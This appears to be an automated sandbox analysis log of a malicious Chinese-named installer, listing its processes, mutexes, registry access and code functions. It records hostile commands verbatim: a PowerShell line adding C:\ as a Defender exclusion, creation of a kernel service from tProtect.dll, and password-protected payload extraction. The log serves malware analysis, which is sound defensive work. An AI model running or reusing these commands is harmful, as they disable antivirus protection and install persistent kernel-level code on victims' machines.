Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA86AF0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6CA83750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007581EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007981C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00784250
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007A8240
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007AC3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007A04C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00788650
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0078C950
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00760943
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00788C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007A0E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007A4EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007710AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0079D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007A1120
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0078D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007A91C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00795180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007AD2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007753F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007153CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007AD470
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007A54D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0075D496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00711572
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007A1550
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00769652
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0079D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00729766
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007197CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007AD9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00711AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00795E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00795F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0072E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007922E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007B2300
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0077E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007925F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007866D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0078A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007AE990
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00792A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0076AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00796CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007970D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0077B121
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0078B180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007A7200
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0073B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007AF3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0079F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0079F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00787410
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007A3530
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007B351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0078F500
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007AF599
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007B3601
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007A77C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00783790
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0073F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0078F910
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00797AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00763AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0072BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00797C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0072BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_0078FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: String function: 6C9F9240 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: String function: 6CA96F10 appears 728 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 007128E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 007AFB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00711E40 appears 172 times
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2044209367.000000007F8CA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000000.2042094476.00000000009B9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2043797965.00000000028BE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe | Binary or memory string: OriginalFileName7RMHWwyl1NfL.exe vs #U5b89#U88c5#U52a9#U624b1.0.1.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal84.evad.winEXE@116/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C9C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00719313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00723D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00719252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Code function: 6_2_6C9C5240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | File created: C:\Program Files (x86)\Windows NT\is-9Q49J.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1576:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3224:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1564:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3116:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2172:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6008:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3176:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:764:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1488:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5628:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:768:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6480:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | File created: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe | Virustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b1.0.1.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | Process created: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | Process created: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20492,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | Process created: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20474,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | Process created: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp "C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp" /SL5="$20492,7641276,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp | Section loaded: wintypes.dll
